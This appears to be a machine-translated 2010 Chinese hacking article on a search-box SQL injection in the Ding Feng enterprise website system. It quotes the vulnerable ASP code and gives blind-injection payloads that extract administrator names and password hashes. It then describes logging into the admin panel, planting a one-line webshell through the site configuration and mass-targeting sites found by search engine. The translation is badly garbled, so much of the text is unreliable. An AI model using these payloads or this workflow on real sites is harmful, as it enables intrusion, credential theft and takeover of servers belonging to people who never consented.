Ding Feng enterprises smart built Station system injection search injection vulnerability analysis and exploit-vulnerability warning-the black bar safety net

ID MYHACK58:62201026318
Type myhack58
Reporter 佚名
Modified 2010-03-04T00:00:00


Author: L4nk0r[Mo if you are asked]

Yesterday the use of this system to get a webshell, but is the use of download the default database, the latter the discoverer of the system interface's also good, by the look of IT security. This article on its search injection vulnerability simple analysis and use, and the bulk to take the shell.

A. A simple analysis

Vulnerability file: zm_search. the asp code is as follows

t=Request. Form("t") key=Request. Form("key")

if t="" or key="" then Response. Write("<script>alert('please input keywords!'); history. back();</script>") Response. End() end if

if t=1 then sql="select * from Zm_Product where name like '%"&key&"%' order by ord asc,id desc" menuname="search product" else sql="select * from Zm_News where title like '%"&key&"%' order by ord asc,id desc" menuname="search news" end if

On the table in a single variable t and key direct access, only to determine whether it is empty, is not empty it into the query, which resulted in a search for the type of injection vulnerability.

Here under the care of newbies:

Learn the following SQL data query in the WHERE clause using the Like operator knowledge,Like operator's role is to fuzzy query,to the use of Like for fuzzy query must be also with wildcard to complete, The"%"is the Like operator is a wildcard,it represents zero or more arbitrary characters,in order for everyone to understand,for everyone to name a few examples:

Like "hacker%" returned to the hacking begin any of the characters Like "%hack" returns to hacking at the end of any character Like "%hack%" the return to include a hack of any character

We open a website,in the search box enter the keyword' and 1=1 and '%'='keyword is"black hat"bar,point to search,results are returned with the black hat-related information, i.e., statement hack' and 1=1 and'%'=', it belongs to normal, later in the input statement, hacker' and 1=2 and '%'=' did not find relevant information. Of course note here that this keyword is going to be able to find the article.

Second, the exploitability of the vulnerability

The principle of knowing, we constructed about the injected statement, here we are to search for the“peak peak”this keyword, Ding Feng all is that you can search to the content, remember here have to be searched otherwise the back is very difficult to distinguish. We go back to the original home search enter the following statements: * the structure of the time to pay attention to the closure before and after the%and single quotes

Peak peak%' and 1=1 and'%'=' -----------------statement 1

But cannot input all of the code, it seems that limiting the search length, open the found maximum is 2 0 characters, in a look at the code to find it is to search. Asp submitted to the zm_search. asp processing. So we can write your own form to a t and the key assignment to break the length limit. The code does not give, is simple we are written down. The form action is set to the value<http://url/search.asp>cannot be submitted to the zm_search. asp, unclear of their own to go to the next Code of view. Well, the input sentence 1.

In a change of the form 1=1 as you can guess it out here take care of a novice, I listed the statements and comments role:

Statement 1: tripod peak%' and 1=1 and ' % ' = ' and 1=1 returns find one, that is normal Statement 2: The Peak-peak%' and 1=1 and ' % ' = ' a; 1=2 clearly does not hold, can't find any article, that returns an exception Statement 3: tripod peak%' and 1<(select count(*) from zm_admin) and'%'='; judgment of the administrator whether the number is greater than 1 Statement 4: tripod peak%' and (select count(name) from zm_admin)>0 and'%'='; judging whether there is a table segment name, by looking at the database we can directly know the existence of. Statement 5: tripod peak%' and select top 1 asc(mid(name,1,1)) from zm_admin)>9 6&'%'='; The Function: determine name table segment the first user name The name of the first character's ascii code is greater than 9 6, that is equal to a

Similarly you can put statement 5 in the name field into the password field, the same method to pick a password md5 hash.

Of course, this injection tool can also be scanned out, but need to add their own fields, in addition to keywords and also add their own one can search to information. Here I recommend NBSI and HDSI these two tools, very simple here is not the demo. Ok

Third, the background get webshell

The injection can give the Administrator's password, then enter the background see the default address: Manage/login. asp here simply use the R function to filter out the single quotes, the Universal password.. Direct injection to get to the Admin Password. In the site configuration heading directly written Word of Trojans, but here to pay attention to the closing statement, configured as follows:


Plug horse successfully, as shown:


Ok. Baidu search can be under the batch test, here not say that we own play, do not for illegal purposes. Of course, this system also has many problems, interested friends can continue to dig.